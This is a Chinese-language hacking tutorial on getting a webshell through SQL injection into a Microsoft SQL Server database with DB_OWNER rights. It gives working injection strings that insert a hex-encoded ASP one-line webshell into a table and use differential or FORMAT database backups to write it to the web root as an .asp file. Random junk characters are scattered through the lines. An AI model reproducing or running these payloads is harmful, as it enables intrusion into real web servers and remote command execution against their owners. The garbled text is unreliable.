DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

2 N: L% e0 R7 k减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
& N5 m$ S' n- d2 q# o: V( Y& }加一个参数WITH DIFFERENTIAL
3 s  g0 q! T, e0 ]6 n
1
2
; T* G! N1 F8 \3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
3 ~) T- Y: S' r$ r6 W, screate table [dbo].[xiaolu] ([cmd] [image]);
# ?- O$ X0 D' B* B% ?" q. I" zinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
2 l" A; y9 D6 @* Kdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
; N- y) O0 @+ l" h1 Z- ^; E
二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
$ j+ b- R% }* X/ j+ _5 r
1
9 a0 _+ f1 n, ^2
3
; R# f5 n/ J/ V# p$ r' r( [4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
5 Y" p  `6 k( j3 \$ W2 @) h- Kcreate table [dbo].[xiaolu] ([cmd] [image]);
! U* m" V5 s" ?1 g8 `2 d" a; ginsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

总的来说就是那么简单几句,下面以备份数据库model为例子
1
* L( M' }' _# ?5 l3 m" ^
+ Z, Y+ \4 q1 j& C1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
6 T2 I. W4 z8 G" @% H; x$ ^2 R
8 A% r! n* i$ {0 e2

* s$ C7 I9 M' J3 q" R1
id=1;backup database model to disk='你的路径‘ with differential,format;--
% M" ?  _% G: b0 X$ f2 z